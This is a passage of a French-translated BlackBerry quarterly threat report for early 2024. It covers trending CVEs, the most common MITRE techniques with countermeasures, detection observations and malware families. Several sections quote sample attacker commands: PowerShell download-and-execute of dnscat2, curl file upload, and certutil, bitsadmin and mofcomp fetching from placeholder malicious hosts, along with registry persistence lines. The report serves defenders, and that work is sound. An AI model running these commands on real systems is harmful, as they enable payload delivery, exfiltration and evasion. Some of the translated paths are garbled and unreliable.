Près de 8 900 nouveaux CVE ont été signalés par le National Institute of Standards and Technology (NIST) entre janvier et mars. Le score de base est composé de paramètres soigneusement calculés qui peuvent être utilisés pour calculer un score de gravité de zéro à 10. Le score de base dominant du CVE était "7", ce qui représentait 26 % du total des scores. Il s'agit d'une augmentation de trois pour cent pour ce score CVE par rapport à la dernière période de rapport. Le mois de mars détient le record du plus grand nombre de CVE nouvellement découverts cette année, avec près de 3 350 nouveaux CVE. Le tableau "Trending CVEs" fait référence à des vulnérabilités spécifiques répertoriées dans la base de données nationale des vulnérabilités du NIST.
CVE en vogue
XZ Utils Backdoor
CVE-2024-3094 (10 critiques)
Accès non autorisé
Ce code malveillant était intégré dans les versions 5.6.0 et 5.6.1 de XZ Utils. La porte dérobée manipulait sshd, ce qui permettait à des attaquants non authentifiés d'accéder sans autorisation aux distributions Linux concernées.
Vulnérabilités Zero-Day d'Ivanti
CVE-2024-21887 (9.1 Critique) ; CVE-2023-46805 (8.2 Elevée) ; CVE-2024-21888 (8.8 Elevée) ; CVE-2024-21893 (8.2 Elevée)
Exécution de code arbitraire
En début d'année, des vulnérabilités de contournement d'authentification et d'injection de commande ont été découvertes dans les produits Ivanti Connect Secure (9.x, 22.x) et Ivanti Policy Secure (9.x, 22.x). Si ces deux vulnérabilités étaient utilisées conjointement par un acteur de la menace, cela lui permettrait de créer des requêtes malveillantes et d'exécuter des commandes arbitraires sur le système.
En janvier, Ivanti a également mis en garde contre deux autres vulnérabilités affectant les produits, CVE-2024-21888 (une vulnérabilité d'escalade des privilèges) et CVE-2024-21893 (une vulnérabilité de falsification des requêtes côté serveur). Des acteurs nationaux ont exploité ces vulnérabilités de type "zero-day" pour déployer des souches de logiciels malveillants personnalisées.
Contournement de l'écran intelligent de Windows
CVE-2024-21412 (8.1 Haut)
Contournement de la sécurité
Il s'agit d'un contournement de la fonction de sécurité des fichiers de raccourcis Internet qui affecte les fichiers de raccourcis Internet de Microsoft Windows. Il nécessite une interaction de l'utilisateur pour contourner les contrôles de sécurité. Dès la première interaction, elle provoque une série d'exécutions qui conduisent finalement la victime à un script malveillant. Cette vulnérabilité de type "zero-day" a été utilisée par un groupe de menace pour déployer le RAT DarkMe.
Vulnérabilité d'élévation du noyau de Windows
CVE-2024-21338 (7.8 Haut)
Élévation de privilèges
L'exploitation de cette vulnérabilité permet à l'attaquant d'obtenir les privilèges du système. Le Lazarus Group (un groupe de menace nord-coréen) a exploité cette vulnérabilité zero-day trouvée dans le pilote AppLocker de Windows (appid.sys) pour obtenir un accès au niveau du noyau.
Exploitation de GoAnywhere MFT de Fortra
CVE-2024-0204 (9.8 critique)
Contournement de l'authentification
En janvier, Fortra a publié un avis de sécurité faisant état d'un contournement critique affectant un produit GoAnywhere MFT. Cette vulnérabilité a été découverte dans le produit GoAnywhere MFT de Fortra avant la version 7.4.1. L'exploitation permet à un utilisateur non autorisé de créer un utilisateur administrateur via le portail d'administration.
Vulnérabilité de lecture arbitraire de fichiers dans Jenkins
CVE-2024-23897 (9.7 Critique)
Exécution de code à distance
Les versions antérieures de Jenkins - jusqu'à 2.441 et antérieures, LTS 2.426.2 - contiennent une vulnérabilité découverte sur le système de fichiers du contrôleur Jenkins via l'interface de ligne de commande intégrée. Elle se trouve dans la bibliothèque args4j, qui possède une fonctionnalité qui remplace le caractère "@" suivi d'un chemin de fichier dans un argument par le contenu du fichier.34 Cela permet à un attaquant de lire des fichiers arbitraires sur le système de fichiers, et pourrait potentiellement conduire à l'exécution de code à distance.
Vulnérabilité de ConnectWise ScreenConnect 23.9.7
CVE-2024-1709 (10 critiques) ; CVE-2024-1708 (8.4 élevés)
Exécution de code à distance
Cette vulnérabilité affecte le produit ConnectWise ScreenConnect 23.9.7. Des attaquants ont été vus en train d'exploiter ces deux vulnérabilités dans la nature. Ces deux vulnérabilités fonctionnent conjointement : CVE-2024-1709 (une vulnérabilité critique de contournement de l'authentification) permet à l'attaquant de créer des comptes administratifs et d'exploiter CVE-2024-1708 (une vulnérabilité de traversée de chemin), ce qui permet un accès non autorisé aux fichiers et aux répertoires de la victime.
Techniques courantes de MITRE
Comprendre les techniques de haut niveau des groupes de menace peut aider à décider des techniques de détection à privilégier. BlackBerry a observé les 20 principales techniques suivantes utilisées par les acteurs de la menace au cours de la période couverte par le rapport.
Une flèche vers le haut dans la dernière colonne indique que l'utilisation de la technique a augmenté depuis notre dernier rapport ; une flèche vers le bas indique que l'utilisation a diminué, et un symbole égal (=) signifie que la technique reste dans la même position que dans notre dernier rapport.
Nom de la technique | ID de la technique | Nom de la tactique | Dernier rapport | Changer |
---|---|---|---|---|
Processus d'injection
|
T1055
|
L'escalade des privilèges, l'évasion des défenses
|
1
|
=
|
Découverte d'informations sur le système
|
T1082
|
Découverte
|
3
|
↑
|
Chargement latéral de DLL
|
T1574.002
|
Persistance, escalade des privilèges, évasion des défenses
|
4
|
↑
|
Capture d'entrée
|
T1056
|
Accès aux données d'identification, Collecte
|
2
|
↓
|
Découverte de logiciels de sécurité
|
T1518.001
|
Découverte
|
NA
|
↑
|
Mascarade
|
T1036
|
Défense Evasion
|
10
|
↑
|
Découverte de fichiers et de répertoires
|
T1083
|
Découverte
|
13
|
↑
|
Découverte du processus
|
T1057
|
Découverte
|
19
|
↑
|
Protocole de la couche application
|
T1071
|
Commande et contrôle
|
6
|
↓
|
Clés d'exécution du registre/dossier de démarrage
|
T1547.001
|
Persistance, escalade des privilèges
|
9
|
↓
|
Protocole de la couche non applicative
|
T1095
|
Commande et contrôle
|
5
|
↓
|
Découverte du système à distance
|
T1018
|
Découverte
|
15
|
↑
|
Découverte de la fenêtre d'application
|
T1010
|
Découverte
|
NA
|
↑
|
Emballage du logiciel
|
T1027.002
|
Défense Evasion
|
NA
|
↑
|
Tâche/travail programmé(e)
|
T1053
|
Exécution, persistance, escalade des privilèges
|
8
|
↓
|
Service Windows
|
T1543.003
|
Persistance, escalade des privilèges
|
12
|
↓
|
Désactiver ou modifier des outils
|
T1562.001
|
Défense Evasion
|
18
|
↑
|
Interprète de commandes et de scripts
|
T1059
|
Exécution
|
7
|
↓
|
Fichiers ou informations obscurcis
|
T1027
|
Défense Evasion
|
NA
|
↑
|
Réplication sur support amovible
|
T1091
|
Accès initial, mouvement latéral
|
11
|
↓
|
ID de la technique | |
---|---|
Processus d'injection |
T1055
|
Découverte d'informations sur le système |
T1082
|
Chargement latéral de DLL |
T1574.002
|
Capture d'entrée |
T1056
|
Découverte de logiciels de sécurité |
T1518.001
|
Mascarade |
T1036
|
Découverte de fichiers et de répertoires |
T1083
|
Découverte du processus |
T1057
|
Protocole de la couche application |
T1071
|
Clés d'exécution du registre/dossier de démarrage |
T1547.001
|
Protocole de la couche non applicative |
T1095
|
Découverte du système à distance |
T1018
|
Découverte de la fenêtre d'application |
T1010
|
Emballage du logiciel |
T1027.002
|
Tâche/travail programmé(e) |
T1053
|
Service Windows |
T1543.003
|
Désactiver ou modifier des outils |
T1562.001
|
Interprète de commandes et de scripts |
T1059
|
Fichiers ou informations obscurcis |
T1027
|
Réplication sur support amovible |
T1091
|
Nom de la tactique | |
---|---|
Processus d'injection |
L'escalade des privilèges, l'évasion des défenses
|
Découverte d'informations sur le système |
Découverte
|
Chargement latéral de DLL |
Persistance, escalade des privilèges, évasion des défenses
|
Capture d'entrée |
Accès aux données d'identification, Collecte
|
Découverte de logiciels de sécurité |
Découverte
|
Mascarade |
Défense Evasion
|
Découverte de fichiers et de répertoires |
Découverte
|
Découverte du processus |
Découverte
|
Protocole de la couche application |
Commande et contrôle
|
Clés d'exécution du registre/dossier de démarrage |
Persistance, escalade des privilèges
|
Protocole de la couche non applicative |
Commande et contrôle
|
Découverte du système à distance |
Découverte
|
Découverte de la fenêtre d'application |
Découverte
|
Emballage du logiciel |
Défense Evasion
|
Tâche/travail programmé(e) |
Exécution, persistance, escalade des privilèges
|
Service Windows |
Persistance, escalade des privilèges
|
Désactiver ou modifier des outils |
Défense Evasion
|
Interprète de commandes et de scripts |
Exécution
|
Fichiers ou informations obscurcis |
Défense Evasion
|
Réplication sur support amovible |
Accès initial, mouvement latéral
|
Dernier rapport | |
---|---|
Processus d'injection |
1
|
Découverte d'informations sur le système |
3
|
Chargement latéral de DLL |
4
|
Capture d'entrée |
2
|
Découverte de logiciels de sécurité |
NA
|
Mascarade |
10
|
Découverte de fichiers et de répertoires |
13
|
Découverte du processus |
19
|
Protocole de la couche application |
6
|
Clés d'exécution du registre/dossier de démarrage |
9
|
Protocole de la couche non applicative |
5
|
Découverte du système à distance |
15
|
Découverte de la fenêtre d'application |
NA
|
Emballage du logiciel |
NA
|
Tâche/travail programmé(e) |
8
|
Service Windows |
12
|
Désactiver ou modifier des outils |
18
|
Interprète de commandes et de scripts |
7
|
Fichiers ou informations obscurcis |
NA
|
Réplication sur support amovible |
11
|
Changer | |
---|---|
Processus d'injection |
=
|
Découverte d'informations sur le système |
↑
|
Chargement latéral de DLL |
↑
|
Capture d'entrée |
↓
|
Découverte de logiciels de sécurité |
↑
|
Mascarade |
↑
|
Découverte de fichiers et de répertoires |
↑
|
Découverte du processus |
↑
|
Protocole de la couche application |
↓
|
Clés d'exécution du registre/dossier de démarrage |
↓
|
Protocole de la couche non applicative |
↓
|
Découverte du système à distance |
↑
|
Découverte de la fenêtre d'application |
↑
|
Emballage du logiciel |
↑
|
Tâche/travail programmé(e) |
↓
|
Service Windows |
↓
|
Désactiver ou modifier des outils |
↑
|
Interprète de commandes et de scripts |
↓
|
Fichiers ou informations obscurcis |
↑
|
Réplication sur support amovible |
↓
|
À l'aide de MITRE D3FEND™, l'équipe de recherche et de renseignement sur les menaces BlackBerry a élaboré une liste complète de contre-mesures pour les techniques observées au cours de cette période de déclaration, qui est disponible dans notre GitHub public.
Les trois premières techniques sont des procédures bien connues utilisées par les adversaires pour recueillir des informations clés afin de mener des attaques réussies. La section Applied Countermeasures contient des exemples de leur utilisation et des informations utiles à surveiller.
L'impact de l'ensemble des techniques et tactiques est illustré dans le graphique ci-dessous :
La tactique la plus répandue au cours de cette période est l'évasion de la défense, qui représente 24 % du total des tactiques observées au cours de cette période, suivie par la découverte ( 23 % ) et l'escalade des privilèges ( 21 %).
Contre-mesures appliquées aux techniques notoires de MITRE
-
Découverte de logiciels de sécurité - T1518.001
Cette technique populaire permet aux acteurs de la cybermenace de trouver la liste des programmes de sécurité, des configurations et des capteurs installés sur un système ou un environnement cloud ciblé. Cela est très important pour un adversaire qui espère ne pas être détecté. Par exemple, si un groupe malveillant exécute l'une des commandes énumérées ci-dessous sur un système compromis et détecte que l'environnement dispose déjà d'une sécurité permettant de repérer les activités malveillantes, il abandonnera souvent l'opération. Dans d'autres cas, des groupes plus avancés et persistants peuvent faire la différence entre les applications de sécurité et trouver un moyen de contourner les applications les plus faibles. L'adversaire peut alors prendre le contrôle d'un système ou d'un environnement en nuage.
Vous trouverez ci-dessous des lignes de commande qu'un pirate pourrait utiliser pour évaluer votre sécurité :
- netsh firewall show
- netsh.exe vidage d'interface
- findstr /s /m /i "defender" *.*
- Liste des tâches /v
- Module Empire Powershell Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-
Mascarade - T1036
Il s'agit d'une tactique sophistiquée de cybermenace employée par les attaquants pour déguiser leurs activités et échapper à la détection. Par exemple, en utilisant un faux nom, une fausse icône et de fausses métadonnées, les actions nuisibles peuvent être facilement déguisées en opérations standard du système. Se faire passer pour un fichier ou un processus légitime peut inciter les utilisateurs et les logiciels de sécurité à ouvrir ou à enregistrer un faux fichier, ce qui peut entraîner une intrusion dans le système et une perte de données. (Vous trouverez des détails sur l'identification d'une méthode de déguisement dans la section CylanceMDR Observations de ce rapport).
Voici un aperçu des méthodes les plus courantes pour se faire passer pour quelqu'un d'autre :
- Renommer les exécutables : Les attaquants renomment souvent les exécutables malveillants pour faire croire qu'il s'agit d'un programme système légitime (par exemple, svchost.exe, explorer.exe) et peuvent modifier ou ajouter une autre fausse extension pour masquer le véritable type de fichier, comme .txt.doc ou .exe.config. L'objectif est de tromper les utilisateurs et les outils de sécurité lors de l'exécution de contrôles manuels ou automatiques du système, afin que l'utilisateur exécute ou tente d'ouvrir le fichier malveillant sans tenir compte des avertissements du système.
- Imitation des chemins d'accès aux fichiers : Dans un répertoire de confiance (ex : System32), l'observation et la détection par les outils de sécurité sont moindres. C'est pourquoi les attaquants placent souvent des fichiers malveillants dans ces répertoires et leur donnent des noms de processus légitimes pour les dissimuler.
- Signature de code invalide : Les attaquants peuvent signer leurs logiciels malveillants avec des certificats numériques invalides ou volés afin de contourner les mesures de sécurité. Cela incite les systèmes et les utilisateurs à faire confiance aux fichiers ou processus malveillants en leur donnant l'impression qu'ils ont été vérifiés par une source légitime. Les attaquants peuvent utiliser des certificats expirés, révoqués ou obtenus frauduleusement. L'identification de ces tactiques nécessite des processus de validation des certificats robustes et des systèmes d'alerte capables de signaler les données inhabituelles des certificats ou les échecs de validation. Par exemple, pour faire passer cmd.exe pour une application de calculatrice, procédez comme suit
Copier c:\Nwindows\system32\Ncmd.exe C:\Ncalc.exe
-
Découverte de fichiers et de répertoires - T1083
La découverte de fichiers et de répertoires est fréquemment utilisée lors de la phase de reconnaissance d'un attaquant afin de mieux connaître l'environnement cible, d'identifier les fichiers susceptibles d'être exfiltrés ou manipulés, de localiser des informations sensibles ou de soutenir d'autres étapes d'une chaîne d'attaque.
Les lignes de commande suivantes sont utilisées pour cette technique :
- 'dir /s C:\path\to\directory' - Utilise l'utilitaire dir pour lister de manière récursive les fichiers et les répertoires d'un certain répertoire et de ses sous-répertoires.
- 'tree /F' - Utilise l'utilitaire tree pour afficher les noms de fichiers dans chaque répertoire ainsi que l'arborescence.
- powershell.exe -c "Get-ChildItem C:\path\to\directory"' - Met en œuvre la cmdlet Get-ChildItem dans powershell, qui récupère une liste de fichiers et de répertoires dans le chemin spécifié.
Les acteurs de la menace peuvent également utiliser les fonctions natives de l'API Windows pour énumérer les fichiers et les répertoires. Les fonctions suivantes de l'API Windows sont utilisées par les auteurs de menaces :
- FindFirstFile - Récupère des informations sur le premier fichier ou répertoire correspondant au nom de fichier ou au nom de répertoire spécifié.
- FindNextFile - Poursuit la recherche d'un fichier initiée par un appel précédent à la fonction FindFirstFile.
- PathFileExists - Vérifie si le répertoire ou le fichier spécifié existe.
-
Protocole de la couche application - T1071
Les acteurs de la menace cherchent constamment de nouveaux moyens de dissimuler leurs actions au sein du trafic légitime afin d'éviter d'être détectés. La manipulation du protocole de la couche d'application (T1071) est une technique populaire. Au cours des trois premiers mois de 2024, cette technique est apparue comme l'une des cinq principales tactiques employées par les acteurs malveillants. En exploitant les vulnérabilités des protocoles réseau couramment utilisés, tels que HTTP, HTTPS, DNS ou SMB, les adversaires peuvent intégrer des activités malveillantes dans le trafic réseau habituel.
Cette technique peut être utilisée pour exfiltrer des données, permettre des communications C2 et se déplacer latéralement au sein de réseaux compromis. Par exemple, les adversaires peuvent encoder des données sensibles dans les en-têtes HTTP ou tirer parti de la tunnelisation DNS pour contourner les défenses du réseau et extraire des informations sans éveiller les soupçons. La nature furtive de la manipulation des protocoles de la couche d'application pose des défis importants en matière de détection et d'attribution, car de nombreux outils de sécurité traditionnels peinent à faire la différence entre une activité de réseau normale et une activité malveillante.
Compte tenu de la prévalence et de la sophistication de cette technique, les organisations doivent adopter des mesures proactives pour renforcer leurs défenses. Une solution robuste de surveillance du réseau doit être capable de détecter les modèles de trafic anormaux et de s'assurer que les comportements suspects associés à la manipulation du protocole de la couche d'application sont correctement différenciés de l'activité normale de l'utilisateur.
En outre, le maintien à jour des correctifs de sécurité pour les protocoles et les applications du réseau peut atténuer les vulnérabilités et les exploits connus. En mettant en œuvre des solutions de détection et de réponse au niveau des terminaux (EDR), les organisations peuvent améliorer leur capacité à identifier et à répondre aux activités malveillantes perpétrées par la manipulation du protocole de la couche application, renforçant ainsi leur posture globale de cybersécurité.
Les commandes APL suivantes sont utilisées par les acteurs de la menace : curl -F "file=@C:Úsers\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1' -
Clés d'exécution du registre / Dossier de démarrage - T1547.001
La manipulation des clés d'exécution du registre et du dossier de démarrage est une technique utilisée par les adversaires pour établir une persistance sur les systèmes compromis. Cette technique figure en bonne place parmi les principales tactiques utilisées par les acteurs de la cybermenace au cours de la période couverte par ce rapport. En manipulant les clés du registre Windows ou en ajoutant des entrées malveillantes aux dossiers de démarrage, les adversaires s'assurent que leurs charges utiles malveillantes s'exécutent automatiquement au démarrage du système ou à la connexion de l'utilisateur, facilitant ainsi le contrôle permanent des systèmes compromis.
Cette technique permet aux adversaires de déployer un large éventail de logiciels malveillants, notamment des portes dérobées, des enregistreurs de frappe et des logiciels rançonneurs, et de conserver ainsi un accès permanent aux systèmes compromis. Les adversaires exploitent les fonctionnalités natives de Windows pour échapper à la détection. L'utilisation abusive des configurations légitimes du système rend la détection et l'atténuation de ces menaces plus difficiles pour les solutions AV traditionnelles.
Pour contrer la menace que représente la manipulation des clés d'exécution du registre et des dossiers de démarrage, les entreprises doivent adopter une approche multicouche de la sécurité des terminaux :
- Contrôler et auditer régulièrement les clés du registre Windows et les dossiers de démarrage afin de détecter les modifications non autorisées indiquant une activité malveillante.
- Mettre en place une liste blanche d'applications pour empêcher l'utilisation d'exécutables non autorisés.
- Mettre en place des contrôles de gestion des privilèges afin de limiter la capacité des adversaires à manipuler les configurations des systèmes critiques.
- Mener des programmes de formation et de sensibilisation des utilisateurs afin de permettre aux employés de reconnaître et de signaler les éléments de démarrage suspects ou les modifications du registre.
- Améliorer les capacités globales de détection et de réponse aux menaces.
Voici quelques commandes auxquelles il faut être attentif :
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Dossiers du shell" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\NMicrosoft\NWindows\NMenu de démarrage\NProgrammes\NDémarrage\NFichier[.]txt"
CylanceMDR Données
Cette section du rapport met en évidence plusieurs des détections de menaces les plus courantes observées dans les environnements des clients de CylanceMDR .
CylanceMDRanciennement connu sous le nom de CylanceGUARD®, est un service de détection et de réponse gérées (MDR) par abonnement, proposé par BlackBerry , qui assure une surveillance 24 heures sur 24 et 7 jours sur 7 et aide les organisations à stopper les cybermenaces sophistiquées qui exploitent les lacunes des programmes de sécurité du client. L'équipe de CylanceMDR a suivi des milliers d'alertes au cours de cette période. Ci-dessous, nous décomposons la télémétrie par région afin de fournir un aperçu supplémentaire du paysage actuel des menaces.
CylanceMDR Observations
Au cours de la période couverte par ce rapport, l'équipe CylanceMDR a observé que Certutil était à l'origine d'un grand nombre de détections au sein du centre opérationnel de sécurité (SOC), à savoir la technique liée aux outils de renommage tels que Certutil (par exemple : "Possible Certutil Renamed Execution"). Il y a eu un pic de détections à ce sujet dans toutes les régions géographiques où BlackBerry protège ses clients.
Dans notre précédent rapport, nous avons expliqué comment les acteurs de la menace abusent ou détournent les utilitaires LOLBAS (living-off-the-land binaries and scripts) tels que Certutil : ils renomment souvent des utilitaires légitimes (tels que Certutil) pour tenter d'échapper aux capacités de détection. Ce phénomène est connu sous le nom de masquerading et porte l'identifiant technique MITRE : T1036.003. Les défenseurs doivent déployer des capacités de détection robustes pour minimiser le risque de techniques d'évasion telles que le masquerading. Par exemple, la création d'une règle de détection qui ne se déclenche que lorsqu'elle voit la commande Certutil (ainsi que les options/arguments utilisés abusivement avec cet outil) peut facilement être contournée.
Prenons par exemple les deux commandes ci-dessous :
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
Si vos capacités de détection reposent uniquement sur l'affichage de la commande certutil (ainsi que de ses options), cette commande sera détectée, mais considérée comme une protection faible, car elle pourrait facilement être contournée.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
Dans ce cas, nous avons renommé certutil.exe en outlook.exe, ce qui permettrait d'échapper complètement à la détection (si l'on utilise la logique décrite ci-dessus).
Une meilleure solution consisterait à s'assurer que les métadonnées du fichier/processus exécutable portable (PE), telles que le nom de fichier original (le nom de fichier interne fourni au moment de la compilation), sont collectées et intégrées dans les capacités de détection. Un décalage entre le nom du fichier sur le disque et les métadonnées PE du binaire est un bon indicateur qu'un binaire a été renommé après la compilation.
Activité LOLBAS
Au cours de cette période, nous avons constaté un changement dans l'activité LOLBAS observée dans les environnements de nos clients :
- Augmentation des détections liées à regsvr32.exe.
- Diminution de l'activité liée à mshta.exe.
- Une forte augmentation des détections liées à bitsadmin.exe.
Vous trouverez ci-dessous un exemple d'utilisation malveillante de LOLBAS (à l'exclusion de ceux qui ont été partagés au cours de la dernière période de référence).
Fichier : Bitsadmin.exe
Mitre : T1197 | T1105
Comment il peut être abusé :
- Téléchargement/upload à partir de ou vers un hôte malveillant (transfert d'outils Ingress)
- Peut être utilisé pour exécuter un processus malveillant
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
Fichier : mofcomp.exe
Mitre : T1218
Comment il peut être abusé :
- Peut être utilisé pour installer des scripts MOF (managed object format) malveillants.
- Les déclarations MOF sont analysées par l'utilitaire mofcomp.exe et ajoutent les classes et les instances de classes définies dans le fichier au référentiel WMI.
Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
Les outils de surveillance et de gestion à distance (RMM) sont fréquemment utilisés par les fournisseurs de services informatiques gérés (MSP) pour surveiller à distance les terminaux de leurs clients. Malheureusement, ces outils permettent également aux acteurs de la menace d'accéder à ces mêmes systèmes. Ces outils offrent une multitude de fonctions d'administration et permettent aux acteurs de la menace de se fondre dans la masse en utilisant des outils fiables et approuvés.
En 2023, l'utilisation abusive des outils RMM a fait l'objet d'une attention particulière en raison de rapports liés à Scattered Spider, un groupe de cyber-attaques soupçonné d'être à l'origine des attaques de MGM Resorts International en septembre 2023. Les membres de Scattered Spider sont considérés comme des experts en ingénierie sociale sophistiquée et déploient diverses techniques telles que les attaques par échange de cartes SIM, le phishing et le push bombing. Ils ont utilisé une série d'outils RMM au cours de leurs attaques, tels que :
- Splashtop
- TeamViewer
- ScreenConnect
Au cours de la première période de déclaration en 2024, l'attention portée aux outils RMM est restée élevée depuis la découverte de deux vulnérabilités dans ConnectWise ScreenConnect (toutes les versions inférieures à la 23.9.8). Les détails des CVE peuvent être consultés ci-dessous :
CVE-2024-1709
CWE-288 : Contournement de l'authentification par un autre chemin ou canal.
CVE-2024-1708
CWE-22 : limitation inappropriée d'un nom de chemin vers un répertoire restreint ("path traversal").
Le graphique ci-dessous illustre les outils RMM les plus courants observés au cours de la période couverte par le présent rapport.
Au cours de notre analyse, nous avons constaté que de nombreux clients utilisent plusieurs outils RMM, ce qui augmente la surface d'attaque et le risque de l'organisation. Les mesures d'atténuation suggérées sont les suivantes
Audit des outils d'accès à distance (outils RMM)
- Identifier les outils RMM actuellement utilisés dans l'environnement.
- Confirmer qu'ils sont approuvés dans l'environnement.
- Si vous utilisez plusieurs outils RMM, déterminez s'il est possible de les consolider. En réduisant le nombre d'outils différents utilisés, on réduit le risque.
Désactiver des ports et des protocoles
- Bloquer les communications réseau entrantes et sortantes vers les ports couramment utilisés et associés à des outils d'accès à distance non approuvés.
Vérifier régulièrement les journaux
- Détecter l'utilisation anormale des outils d'accès à distance.
Patching
- Assurer un examen régulier des vulnérabilités associées aux outils RMM utilisés, en les mettant à jour si nécessaire.
- Les logiciels accessibles par l'internet, tels que les outils RMM, devraient toujours être une priorité absolue lors des cycles de correctifs réguliers.
Segmentation du réseau
- Minimiser les mouvements latéraux en segmentant le réseau et en limitant l'accès aux appareils et aux données.
Marquage des appareils
- Vérifiez si votre fournisseur de sécurité propose des options pour marquer les dispositifs qui utilisent des outils RMM. Si c'est le cas, activez cette option pour garantir la visibilité du SOC. Certains fournisseurs proposent des options permettant de laisser une note/étiquette identifiant les outils/activités approuvés, ce qui aide grandement les analystes lors des enquêtes.
Chargement de mémoire RMM
- Utilisez un logiciel de sécurité capable de détecter les accès à distance qui ne sont chargés que dans la mémoire.
Conclusion
Ce rapport de 90 jours est conçu pour vous aider à rester informé et préparé aux menaces futures. Face à l'évolution rapide du paysage des menaces de cybersécurité, il est utile de se tenir au courant des dernières actualités en matière de sécurité pour votre secteur d'activité, votre région géographique et les questions clés. Voici nos principales conclusions pour la période de janvier à mars 2024 :
- Globalement, BlackBerry a arrêté 37 000 attaques par jour dirigées contre nos locataires, selon notre télémétrie interne Attacks Stopped. Nous avons constaté une forte augmentation des logiciels malveillants uniques ciblant nos locataires et nos clients, en hausse de 40 % par minute par rapport à la période précédente. Cela pourrait suggérer que les acteurs de la menace prennent des mesures importantes pour cibler soigneusement leurs victimes.
- Les voleurs d'informations occupent une place prépondérante dans les sections "Infrastructures critiques", "Entreprises commerciales" et "Principales menaces". Cela suggère que les données sensibles et privées sont très recherchées par les acteurs de la menace dans toutes les régions géographiques et tous les secteurs d'activité.
- Comme le souligne notre nouvelle section sur les ransomwares, qui décrit les groupes de ransomwares les plus importants, les ransomwaresciblent de plus en plus les infrastructures critiques, en particulier les soins de santé.
- L'exploitation des CVE s'est rapidement développée au cours de l'année écoulée et continuera à le faire. BlackBerry a enregistré près de 9 000 nouveaux CVE divulgués par le NIST au cours des trois derniers mois. En outre, plus de 56 % de ces vulnérabilités divulguées ont obtenu un score de criticité supérieur à 7,0. Les exploits liés à des logiciels légitimes très utilisés tels que ConnectWise ScreenConnect, GoAnywhere et de nombreux produits Ivanti authentiques ont été exploités par des acteurs de la menace à un rythme alarmant pour diffuser toute une série de logiciels malveillants sur les machines des victimes non corrigées.
- Les tromperies politiques par le biais de "deepfakes" et de fausses informations se répandent de plus en plus sur les médias sociaux et continueront à poser problème à l'avenir, notamment en raison de l'invasion de l'Ukraine par la Russie, du conflit en cours au Moyen-Orient et des prochaines élections présidentielles américaines qui auront lieu au mois de novembre.
De plus amples informations sur les principales menaces et défenses en matière de cybersécurité sont disponibles sur le blogBlackBerry .
Remerciements
Ce rapport est le fruit de la collaboration de nos équipes et de nos collaborateurs talentueux. Nous tenons à remercier tout particulièrement
Annexe : Menaces pesant sur les infrastructures critiques et les entreprises commerciales
8Base ransomware : Un groupe de ransomware particulièrement agressif apparu pour la première fois en 2023. Il a été extrêmement actif au cours de sa courte histoire, ciblant souvent des victimes en Amérique du Nord et dans les pays du LATAM. Le groupe de menace utilise un ensemble de tactiques pour obtenir un accès initial, puis peut également exploiter les vulnérabilités des systèmes de la victime pour maximiser le paiement potentiel.
Amadey (Amadey Bot) : Réseau de zombies multifonctionnel de conception modulaire. Une fois installé sur l'appareil d'une victime, Amadey peut recevoir des commandes de ses serveurs C2 pour exécuter diverses tâches, notamment le vol d'informations et le déploiement de charges utiles supplémentaires.
Buhti : Ransomware relativement récent, Buhti utilise des variantes des familles de ransomware LockBit 3.0 (alias LockBit Black) et Babuk pour attaquer les systèmes Windows et Linux. En outre, Buhti est connu pour utiliser un utilitaire d'exfiltration de données personnalisé écrit dans le langage de programmation "Go", conçu pour voler des fichiers avec des extensions spécifiques. Les opérateurs de ransomware ont également déjà été vus en train d'exploiter rapidement d'autres bogues graves affectant l'application d'échange de fichiers Aspera Faspex d'IBM (CVE-2022-47986) et la vulnérabilité PaperCut récemment corrigée (CVE-2023-27350).
LummaStealer (LummaC2) : Un infostealer en C qui cible les entreprises commerciales et les organisations d'infrastructures critiques, en se concentrant sur l'exfiltration de données privées et sensibles de l'appareil de la victime. Souvent promu et distribué via des forums clandestins et des groupes Telegram, cet infostealer s'appuie souvent sur des chevaux de Troie et du spam pour se propager.
PrivateLoader : Une famille de téléchargeurs tristement célèbre qui sévit depuis 2021 et qui cible principalement les entreprises commerciales d'Amérique du Nord. PrivateLoader (comme son nom l'indique) est un mécanisme d'accès initial qui facilite le déploiement d'une pléthore de charges utiles malveillantes sur les appareils des victimes, à savoir les voleurs d'informations. PrivateLoader exploite un réseau de distribution par le biais d'un service souterrain de paiement à l'installation (PPI) afin de financer son utilisation et son développement continus.
RaccoonStealer : MaaS infostealer. Dans la nature depuis 2019, les créateurs de RaccoonStealer ont amélioré ses capacités à éviter les logiciels de sécurité et les logiciels antivirus traditionnels. Selon la télémétrie interne de BlackBerry, RaccoonStealer a été observé en train de cibler des entreprises commerciales en Amérique du Nord.
RedLine (RedLine Stealer) : : un logiciel malveillant de vol d'informations largement distribué et souvent vendu par l'intermédiaire de MaaS. La principale motivation du groupe de menace qui distribue le logiciel malveillant semble être le gain financier plutôt que la politique, la destruction ou l'espionnage. C'est pourquoi RedLine a activement ciblé toute une série d'industries et de régions géographiques.
Remcos (RemcosRAT) : Un RAT de qualité commerciale utilisé pour contrôler à distance un ordinateur ou un appareil. Bien que présenté comme un logiciel légitime, ce logiciel de contrôle et de surveillance à distance était souvent utilisé comme un cheval de Troie d'accès à distance.
SmokeLoader : Un logiciel malveillant couramment utilisé et doté d'une pléthore de capacités, notamment le déploiement d'autres logiciels malveillants sur l'appareil d'une victime. SmokeLoader est une menace récurrente observée par BlackBerry dans le cadre de plusieurs rapports mondiaux de renseignement sur les menaces. Au cours de la période couverte par ce rapport, le logiciel malveillant a ciblé des services commerciaux et professionnels en Amérique du Nord.
